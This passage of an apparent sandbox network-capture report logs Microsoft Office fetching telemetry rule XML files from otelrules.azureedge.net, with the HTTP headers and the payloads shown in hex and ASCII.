22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:02 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:02 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: a288df0b-b01e-00ab-0601-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001502Z-16547b76f7fx6rhxhC1DFW76kg0000000de0000000002b15 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:02 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:03 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-16547b76f7fnlcwwhC1DFWz6gw0000000dhg000000004fd1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:03 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:03 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2676c640-401e-0048-235f-2e0409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-15869dbbcc6pfq2ghC1DFWmp1400000006qg0000000071qe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:03 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:02 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:03 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-16547b76f7fq9mcrhC1DFWq15w0000000d8g00000000mzbd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:03 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:03 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:03 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 4d669d22-301e-0051-20ad-3138bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-17df447cdb5fzdpxhC1DFWdd3400000009w0000000008b7r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:03 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:03 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:03 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 3dfc1e98-801e-0078-4cd0-30bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-17df447cdb5km9skhC1DFWy2rc00000009vg00000000srba x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:03 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:03 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:03 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 757ea358-e01e-000c-6553-328e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001503Z-17df447cdb5wrr5fhC1DFWte8n00000009yg00000000et1n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:04 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 59ce3d71-401e-0067-465c-3209c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-17df447cdb5zfhrmhC1DFWh33000000009gg00000000n5r7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-15869dbbcc6rmhmhhC1DFWr8y000000005d000000000a8n0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:04 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-16547b76f7f9rdn9hC1DFWfk7s0000000dag00000000cxs0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:04 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-16547b76f7f22sh5hC1DFWyb4w0000000dbg000000003s87 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:04 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:04 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:04 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:04 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: c005f6c1-a01e-003d-4d3f-2e98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001504Z-15869dbbcc6lxrkghC1DFWqpdc00000005qg00000000ac39 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
